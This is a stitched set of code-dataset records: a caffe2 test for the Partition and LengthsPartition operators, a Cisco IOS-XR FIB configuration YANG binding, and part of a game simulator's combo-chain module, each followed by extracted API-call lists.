] | [((323, 335), 'hendrix.options.options', 'hx_options', ([], {}), '()\n', (333, 335), True, 'from hendrix.options import options as hx_options\n'), ((495, 533), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (500, 533), False, 'from mock import patch\n'), ((2090, 2114), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (2105, 2114), False, 'from hendrix import ux\n'), ((2460, 2471), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2469, 2471), False, 'import os\n'), ((2600, 2631), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['self.DEFAULTS'], {}), '(self.DEFAULTS)\n', (2616, 2631), False, 'from hendrix import ux\n'), ((2912, 2937), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['options'], {}), '(options)\n', (2928, 2937), False, 'from hendrix import ux\n'), ((3479, 3502), 'hendrix.ux.devFriendly', 'ux.devFriendly', (['options'], {}), '(options)\n', (3493, 3502), False, 'from hendrix import ux\n'), ((3807, 3831), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (3822, 3831), False, 'from hendrix import ux\n'), ((4240, 4264), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (4255, 4264), False, 'from hendrix import ux\n'), ((793, 831), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (798, 831), False, 'from mock import patch\n'), ((1023, 1047), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1038, 1047), False, 'from hendrix import ux\n'), ((1171, 1209), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1176, 1209), False, 'from mock import patch\n'), ((1470, 1508), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1475, 1508), False, 'from mock import patch\n'), ((1808, 1832), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1823, 1832), False, 'from hendrix import ux\n'), ((4628, 4647), 'mock.patch', 'patch', (['"""time.sleep"""'], {}), "('time.sleep')\n", (4633, 4647), False, 'from mock import patch\n'), ((2799, 2810), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2808, 2810), False, 'import os\n'), ((4666, 4691), 'mock.patch', 'patch', (['"""subprocess.Popen"""'], {}), "('subprocess.Popen')\n", (4671, 4691), False, 'from mock import patch\n'), ((4765, 4774), 'hendrix.ux.main', 'ux.main', ([], {}), '()\n', (4772, 4774), False, 'from hendrix import ux\n')] |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace
from caffe2.python.test_util import TestCase, rand_array
class TestPartitionOps(TestCase):
def test_configs(self):
# (main dims, partitions, main type, [list of (extra dims, type)])
configs = [
((10, ), 3),
((4, ), 10),
((10, 10), 4),
((100, ), 2),
((5, ), 1),
((1, ), 1),
((2, 10), 2),
]
suffixes = [
[],
[((2, 2), np.float32)],
[((3, ), np.int64), ((2, ), np.float32)],
]
return [
(main_dims, parts, main_type, extra, pack)
for main_dims, parts in configs
for main_type in [np.int32, np.int64] for extra in suffixes
for pack in [False, True]
]
def testPartition(self):
for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
ins = ['in' + str(i) for i in range(1 + len(extra_ins))]
outs = [
'in{}_p{}'.format(j, i)
for i in range(parts) for j in range(1 + len(extra_ins))
]
op = core.CreateOperator(
'Partition', ins, outs, pack_first_input=(1 if pack else 0))
x = []
for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
if t in [np.float32, np.float64]:
d = rand_array(*(main_dims + dims))
else:
d = np.random.randint(-100, 100, (main_dims + dims))
d = d.astype(t)
workspace.FeedBlob(ins[i], d)
x.append(d)
def sharding(x):
# numpy has proper modulo op that yields non-negative results
shards = (x[0] % parts).reshape([-1])
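                # each element of the first (key) input picks its partition via value % parts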
out = []
for i in range(parts):
for ind, v in enumerate(x):
suffix_shape = v.shape[len(x[0].shape):]
accum = []
data = v.reshape((-1, ) + suffix_shape)
if pack and ind == 0:
data = data // parts
for j, s in enumerate(shards):
if s == i:
accum.append(data[j])
def join(a):
if not a:
return np.empty(shape=(0, ) + suffix_shape)
return np.stack(a)
out.append(join(accum))
return out
workspace.RunOperatorOnce(op)
ref = sharding(x)
print(x)
print(ref)
for name, expected in zip(outs, ref):
np.testing.assert_array_equal(
expected, workspace.FetchBlob(name)
)
# test inverse operation (GatherByKey)
if len(main_dims) == 1:
# currently only 1D key tensor supported
for i in range(len(extra_ins)):
expected_out = ins[i + 1]
gather_ins = [ins[0]] + [
outs[len(ins) * p + i + 1] for p in range(parts)]
actual_out = expected_out + '_actual'
op = core.CreateOperator(
'GatherByKey', gather_ins, actual_out)
workspace.RunOperatorOnce(op)
expected = workspace.FetchBlob(expected_out)
actual = workspace.FetchBlob(actual_out)
np.testing.assert_array_equal(expected, actual)
def testLengthsPartition(self):
for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
# For LengthsSharding only 1-D tensors supported as a first input
if len(main_dims) > 1:
continue
ins = ['in' + str(i) for i in range(2 + len(extra_ins))]
outs = [
'in{}_p{}'.format(j, i)
for i in range(parts) for j in range(2 + len(extra_ins))
]
op = core.CreateOperator(
'LengthsPartition', ins, outs,
pack_first_input=(1 if pack else 0)
)
x = []
for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
if t in [np.float32, np.float64]:
d = rand_array(*(main_dims + dims))
else:
d = np.random.randint(-100, 100, (main_dims + dims))
d = d.astype(t)
workspace.FeedBlob(ins[i + 1], d)
x.append(d)
# Randomly generate length tensor as well
elements = np.random.randint(2, 10)
lengths = []
total_length = 0
for _ in range(elements - 1):
lengths.append(np.random.randint(main_dims[0] - total_length))
total_length += lengths[-1]
lengths.append(main_dims[0] - total_length)
workspace.FeedBlob(ins[0], np.array(lengths, dtype=np.int32))
def sharding(x):
# numpy has proper modulo op that yields non-negative results
shards = (x[0] % parts).reshape([-1])
out = []
for i in range(parts):
idx = 0
sharded_lengths = np.zeros(elements)
for ind, length in enumerate(lengths):
for _ in range(length):
if shards[idx] == i:
sharded_lengths[ind] += 1
idx += 1
out.append(sharded_lengths)
for ind, v in enumerate(x):
suffix_shape = v.shape[len(x[0].shape):]
accum = []
data = v.reshape((-1, ) + suffix_shape)
if pack and ind == 0:
data = data // parts
for j, s in enumerate(shards):
if s == i:
accum.append(data[j])
def join(a):
if not a:
return np.empty(shape=(0, ) + suffix_shape)
return np.stack(a)
out.append(join(accum))
return out
workspace.RunOperatorOnce(op)
ref = sharding(x)
for name, expected in zip(outs, ref):
np.testing.assert_array_equal(
expected, workspace.FetchBlob(name)
)
if __name__ == "__main__":
import unittest
unittest.main()
| [
"caffe2.python.test_util.rand_array",
"caffe2.python.workspace.RunOperatorOnce",
"caffe2.python.workspace.FetchBlob",
"numpy.array",
"numpy.random.randint",
"numpy.zeros",
"numpy.stack",
"numpy.empty",
"caffe2.python.core.CreateOperator",
"unittest.main",
"numpy.testing.assert_array_equal",
"caffe2.python.workspace.FeedBlob"
] | [((7638, 7653), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7651, 7653), False, 'import unittest\n'), ((2004, 2082), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""Partition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('Partition', ins, outs, pack_first_input=1 if pack else 0)\n", (2023, 2082), False, 'from caffe2.python import core, workspace\n'), ((3473, 3502), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (3498, 3502), False, 'from caffe2.python import core, workspace\n'), ((5009, 5098), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""LengthsPartition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('LengthsPartition', ins, outs, pack_first_input=1 if\n pack else 0)\n", (5028, 5098), False, 'from caffe2.python import core, workspace\n'), ((5625, 5649), 'numpy.random.randint', 'np.random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (5642, 5649), True, 'import numpy as np\n'), ((7355, 7384), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (7380, 7384), False, 'from caffe2.python import core, workspace\n'), ((2444, 2473), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i]', 'd'], {}), '(ins[i], d)\n', (2462, 2473), False, 'from caffe2.python import core, workspace\n'), ((5485, 5518), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i + 1]', 'd'], {}), '(ins[i + 1], d)\n', (5503, 5518), False, 'from caffe2.python import core, workspace\n'), ((5964, 5997), 'numpy.array', 'np.array', (['lengths'], {'dtype': 'np.int32'}), '(lengths, dtype=np.int32)\n', (5972, 5997), True, 'import numpy as np\n'), ((2269, 2300), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (2279, 2300), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((2347, 2393), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (2364, 2393), True, 'import numpy as np\n'), ((3704, 3729), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (3723, 3729), False, 'from caffe2.python import core, workspace\n'), ((4190, 4248), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""GatherByKey"""', 'gather_ins', 'actual_out'], {}), "('GatherByKey', gather_ins, actual_out)\n", (4209, 4248), False, 'from caffe2.python import core, workspace\n'), ((4294, 4323), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (4319, 4323), False, 'from caffe2.python import core, workspace\n'), ((4355, 4388), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['expected_out'], {}), '(expected_out)\n', (4374, 4388), False, 'from caffe2.python import core, workspace\n'), ((4418, 4449), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['actual_out'], {}), '(actual_out)\n', (4437, 4449), False, 'from caffe2.python import core, workspace\n'), ((4470, 4517), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['expected', 'actual'], {}), '(expected, actual)\n', (4499, 4517), True, 'import numpy as np\n'), ((5310, 5341), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (5320, 5341), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((5388, 5434), 'numpy.random.randint', 
'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (5405, 5434), True, 'import numpy as np\n'), ((5777, 5823), 'numpy.random.randint', 'np.random.randint', (['(main_dims[0] - total_length)'], {}), '(main_dims[0] - total_length)\n', (5794, 5823), True, 'import numpy as np\n'), ((6291, 6309), 'numpy.zeros', 'np.zeros', (['elements'], {}), '(elements)\n', (6299, 6309), True, 'import numpy as np\n'), ((7542, 7567), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (7561, 7567), False, 'from caffe2.python import core, workspace\n'), ((3372, 3383), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (3380, 3383), True, 'import numpy as np\n'), ((7254, 7265), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (7262, 7265), True, 'import numpy as np\n'), ((3300, 3335), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (3308, 3335), True, 'import numpy as np\n'), ((7182, 7217), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (7190, 7217), True, 'import numpy as np\n')] |
""" Cisco_IOS_XR_fib_common_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR fib\-common package configuration.
This module contains definitions
for the following management objects\:
fib\: CEF configuration
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class FibPbtsFallback(Enum):
"""
FibPbtsFallback (Enum Class)
Fib pbts fallback
.. data:: list = 1
Fallback to class number list
.. data:: any = 2
Fallback to any class
.. data:: drop = 3
Fallback to drop
"""
list = Enum.YLeaf(1, "list")
any = Enum.YLeaf(2, "any")
drop = Enum.YLeaf(3, "drop")
class FibPbtsForwardClass(Enum):
"""
FibPbtsForwardClass (Enum Class)
Fib pbts forward class
.. data:: any = 8
Any class
"""
any = Enum.YLeaf(8, "any")
class Fib(Entity):
"""
CEF configuration
.. attribute:: pbts_forward_class_fallbacks
PBTS class configuration
**type**\: :py:class:`PbtsForwardClassFallbacks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks>`
.. attribute:: platform
FIB platform parameters
**type**\: :py:class:`Platform <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform>`
.. attribute:: auto_hash_recover
Set option for automatcially recovering consistent\-hashing state on interface up
**type**\: bool
.. attribute:: prefer_aib_routes
Set options for adjacency routes overriding RIB routes
**type**\: bool
.. attribute:: encap_sharing_disable
Set true to disable encapsulation sharing
**type**\: bool
.. attribute:: frr_follow_bgp_pic
Set option for fast\-reroute to follow BGP PIC update, not to wait for timeout
**type**\: bool
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib, self).__init__()
self._top_entity = None
self.yang_name = "fib"
self.yang_parent_name = "Cisco-IOS-XR-fib-common-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbts-forward-class-fallbacks", ("pbts_forward_class_fallbacks", Fib.PbtsForwardClassFallbacks)), ("platform", ("platform", Fib.Platform))])
self._leafs = OrderedDict([
('auto_hash_recover', (YLeaf(YType.boolean, 'auto-hash-recover'), ['bool'])),
('prefer_aib_routes', (YLeaf(YType.boolean, 'prefer-aib-routes'), ['bool'])),
('encap_sharing_disable', (YLeaf(YType.boolean, 'encap-sharing-disable'), ['bool'])),
('frr_follow_bgp_pic', (YLeaf(YType.boolean, 'frr-follow-bgp-pic'), ['bool'])),
])
self.auto_hash_recover = None
self.prefer_aib_routes = None
self.encap_sharing_disable = None
self.frr_follow_bgp_pic = None
self.pbts_forward_class_fallbacks = Fib.PbtsForwardClassFallbacks()
self.pbts_forward_class_fallbacks.parent = self
self._children_name_map["pbts_forward_class_fallbacks"] = "pbts-forward-class-fallbacks"
self.platform = Fib.Platform()
self.platform.parent = self
self._children_name_map["platform"] = "platform"
self._segment_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib, ['auto_hash_recover', 'prefer_aib_routes', 'encap_sharing_disable', 'frr_follow_bgp_pic'], name, value)
class PbtsForwardClassFallbacks(Entity):
"""
PBTS class configuration
.. attribute:: pbts_forward_class_fallback
Set PBTS class for fallback
**type**\: list of :py:class:`PbtsForwardClassFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback>`
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.PbtsForwardClassFallbacks, self).__init__()
self.yang_name = "pbts-forward-class-fallbacks"
self.yang_parent_name = "fib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbts-forward-class-fallback", ("pbts_forward_class_fallback", Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])
self._leafs = OrderedDict()
self.pbts_forward_class_fallback = YList(self)
self._segment_path = lambda: "pbts-forward-class-fallbacks"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.PbtsForwardClassFallbacks, [], name, value)
class PbtsForwardClassFallback(Entity):
"""
Set PBTS class for fallback
.. attribute:: forward_class_number (key)
PBTS forward class number
**type**\: union of the below types:
**type**\: :py:class:`FibPbtsForwardClass <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsForwardClass>`
**type**\: int
**range:** 0..8
.. attribute:: fallback_type
Set PBTS fallback type
**type**\: :py:class:`FibPbtsFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsFallback>`
**mandatory**\: True
.. attribute:: fallback_class_number_array
Set PBTS fallback class number array
**type**\: list of int
**range:** 0..7
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, self).__init__()
self.yang_name = "pbts-forward-class-fallback"
self.yang_parent_name = "pbts-forward-class-fallbacks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['forward_class_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('forward_class_number', (YLeaf(YType.str, 'forward-class-number'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsForwardClass', ''),'int'])),
('fallback_type', (YLeaf(YType.enumeration, 'fallback-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsFallback', '')])),
('fallback_class_number_array', (YLeafList(YType.uint32, 'fallback-class-number-array'), ['int'])),
])
self.forward_class_number = None
self.fallback_type = None
self.fallback_class_number_array = []
self._segment_path = lambda: "pbts-forward-class-fallback" + "[forward-class-number='" + str(self.forward_class_number) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/pbts-forward-class-fallbacks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, ['forward_class_number', 'fallback_type', 'fallback_class_number_array'], name, value)
class Platform(Entity):
"""
FIB platform parameters
.. attribute:: label_switched_multicast
Options for label\-switched\-multicast parameters
**type**\: :py:class:`LabelSwitchedMulticast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform.LabelSwitchedMulticast>`
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.Platform, self).__init__()
self.yang_name = "platform"
self.yang_parent_name = "fib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("label-switched-multicast", ("label_switched_multicast", Fib.Platform.LabelSwitchedMulticast))])
self._leafs = OrderedDict()
self.label_switched_multicast = Fib.Platform.LabelSwitchedMulticast()
self.label_switched_multicast.parent = self
self._children_name_map["label_switched_multicast"] = "label-switched-multicast"
self._segment_path = lambda: "platform"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.Platform, [], name, value)
class LabelSwitchedMulticast(Entity):
"""
Options for label\-switched\-multicast parameters
.. attribute:: frr_holdtime
Set time to keep FRR slots programmed post FRR
**type**\: int
**range:** 3..180
**units**\: second
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.Platform.LabelSwitchedMulticast, self).__init__()
self.yang_name = "label-switched-multicast"
self.yang_parent_name = "platform"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('frr_holdtime', (YLeaf(YType.uint32, 'frr-holdtime'), ['int'])),
])
self.frr_holdtime = None
self._segment_path = lambda: "label-switched-multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/platform/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib.Platform.LabelSwitchedMulticast, ['frr_holdtime'], name, value)
def clone_ptr(self):
self._top_entity = Fib()
return self._top_entity
| [
"collections.OrderedDict",
"ydk.types.YLeafList",
"ydk.types.YLeaf",
"ydk.types.YList",
"ydk.types.Enum.YLeaf"
] | [((906, 927), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(1)', '"""list"""'], {}), "(1, 'list')\n", (916, 927), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((939, 959), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(2)', '"""any"""'], {}), "(2, 'any')\n", (949, 959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((972, 993), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(3)', '"""drop"""'], {}), "(3, 'drop')\n", (982, 993), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((1161, 1181), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(8)', '"""any"""'], {}), "(8, 'any')\n", (1171, 1181), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2597, 2761), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallbacks', ('pbts_forward_class_fallbacks', Fib.\n PbtsForwardClassFallbacks)), ('platform', ('platform', Fib.Platform))]"], {}), "([('pbts-forward-class-fallbacks', (\n 'pbts_forward_class_fallbacks', Fib.PbtsForwardClassFallbacks)), (\n 'platform', ('platform', Fib.Platform))])\n", (2608, 2761), False, 'from collections import OrderedDict\n'), ((4804, 4943), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallback', ('pbts_forward_class_fallback', Fib.\n PbtsForwardClassFallbacks.PbtsForwardClassFallback))]"], {}), "([('pbts-forward-class-fallback', ('pbts_forward_class_fallback',\n Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\n", (4815, 4943), False, 'from collections import OrderedDict\n'), ((4966, 4979), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4977, 4979), False, 'from collections import OrderedDict\n'), ((5028, 5039), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (5033, 5039), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', (["[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\n LabelSwitchedMulticast))]"], {}), "([('label-switched-multicast', ('label_switched_multicast', Fib.\n Platform.LabelSwitchedMulticast))])\n", (8960, 9064), False, 'from collections import OrderedDict\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (9097, 9099), False, 'from collections import OrderedDict\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (6956, 6960), False, 'from collections import OrderedDict\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (10527, 10531), False, 'from collections import OrderedDict\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""auto-hash-recover"""'], {}), "(YType.boolean, 'auto-hash-recover')\n", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""prefer-aib-routes"""'], {}), "(YType.boolean, 'prefer-aib-routes')\n", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3007, 3052), 
'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""encap-sharing-disable"""'], {}), "(YType.boolean, 'encap-sharing-disable')\n", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""frr-follow-bgp-pic"""'], {}), "(YType.boolean, 'frr-follow-bgp-pic')\n", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""forward-class-number"""'], {}), "(YType.str, 'forward-class-number')\n", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '"""fallback-type"""'], {}), "(YType.enumeration, 'fallback-type')\n", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '"""fallback-class-number-array"""'], {}), "(YType.uint32, 'fallback-class-number-array')\n", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""frr-holdtime"""'], {}), "(YType.uint32, 'frr-holdtime')\n", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')] |
"""Series of actions that form a combo chain"""
from __future__ import annotations
from typing import Optional, Sequence, TYPE_CHECKING
from action import Action
from core.utility import Array
from core.constants import PlayerForm, SimActKind, MomentType
from core.database import FromDB
if TYPE_CHECKING:
from entity.player import Player
class Combos:
def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None:
self.player = player
self.actions: Array[Action] = Array()
for idx, act_id in enumerate(act_ids):
self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))
self.ex_actions = None
if ex_act_ids:
self.ex_actions: Array[Action] = Array()
for idx, act_id in enumerate(ex_act_ids):
if not act_id:
self.ex_actions.append(None)
continue
self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))
def next(self):
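        # advance along the combo chain; once the chain ends (or the current action is not
        # part of it) restart from the first combo action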
if self.player.current in self.actions:
try:
return self.actions[self.player.current.index + 1]
except IndexError:
pass
return self.actions[1]
def __repr__(self) -> str:
if self.ex_actions:
return "->".join(map(repr, self.actions)) + "\tEX[" + "->".join(map(repr, self.ex_actions)) + "]"
return "->".join(map(repr, self.actions))
class UniqueCombos(Combos, FromDB, table="CharaUniqueCombo"):
def __init__(self, id: int, player: Player) -> None:
FromDB.__init__(self, id)
act_ids = (self._data["_ActionId"] + i for i in range(self._data["_MaxComboNum"]))
ex_act_ids = None if not self._data["_ExActionId"] else (self._data["_ExActionId"] + i for i in range(self._data["_MaxComboNum"]))
Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)
if self._data["_ShiftConditionType"] == 1:
self.player.events.listen(MomentType.HIT, self.enable)
def enable(self, *args, **kwargs):
pass
class DefaultCombos(Combos, FromDB, table="WeaponType"):
def __init__(self, id: int, player: Player) -> None:
FromDB.__init__(self, id)
act_ids = (self._data[f"_DefaultSkill{i+1:02}"] for i in range(5) if self._data[f"_DefaultSkill{i+1:02}"])
ex_act_ids = None if not self._data["_DefaultSkill05Ex"] else (0, 0, 0, 0, self._data["_DefaultSkill05Ex"])
Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)
class DragonCombos(Combos):
def __init__(self, id: int, combo_max: int, player: Player) -> None:
act_ids = (id + i for i in range(combo_max))
Combos.__init__(self, player, PlayerForm.DRG, act_ids)
| [
"core.utility.Array",
"action.Action",
"core.database.FromDB.__init__"
